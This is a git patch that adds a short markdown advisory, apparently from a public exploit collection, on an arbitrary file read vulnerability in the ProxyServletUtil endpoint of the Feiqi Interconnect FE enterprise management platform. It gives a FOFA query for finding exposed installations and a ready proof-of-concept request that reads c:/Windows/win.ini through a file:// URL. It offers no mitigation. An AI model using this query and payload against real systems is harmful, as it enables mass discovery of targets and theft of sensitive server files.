From 1a6a645e473b98931f69db907d8fcfd97a9e2b92 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 17 Apr 2024 20:02:02 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E9=A3=9E=E4=BC=81=E4=BA=92=E8=81=94-F?= =?UTF-8?q?E=E4=BC=81=E4=B8=9A=E8=BF=90=E8=90=A5=E7=AE=A1=E7=90=86?= =?UTF-8?q?=E5=B9=B3=E5=8F=B0ProxyServletUti=E5=AD=98=E5=9C=A8=E4=BB=BB?= =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...运营管理平台ProxyServletUti存在任意文件读取漏洞.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md diff --git a/飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md b/飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md new file mode 100644 index 0000000..fdf4fd3 --- /dev/null +++ b/飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md @@ -0,0 +1,15 @@ +## 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞 + +飞企互联FE业务协作平台中的ProxyServletUti接口存在任意文件读取漏洞。攻击者可以通过构造特定请求,读取服务器上的敏感文件。 + + + +## fofa +``` +app="飞企互联-FE企业运营管理平台" +``` + +## poc +``` +/ProxyServletUtil?url=file:///c:/Windows/win.ini +```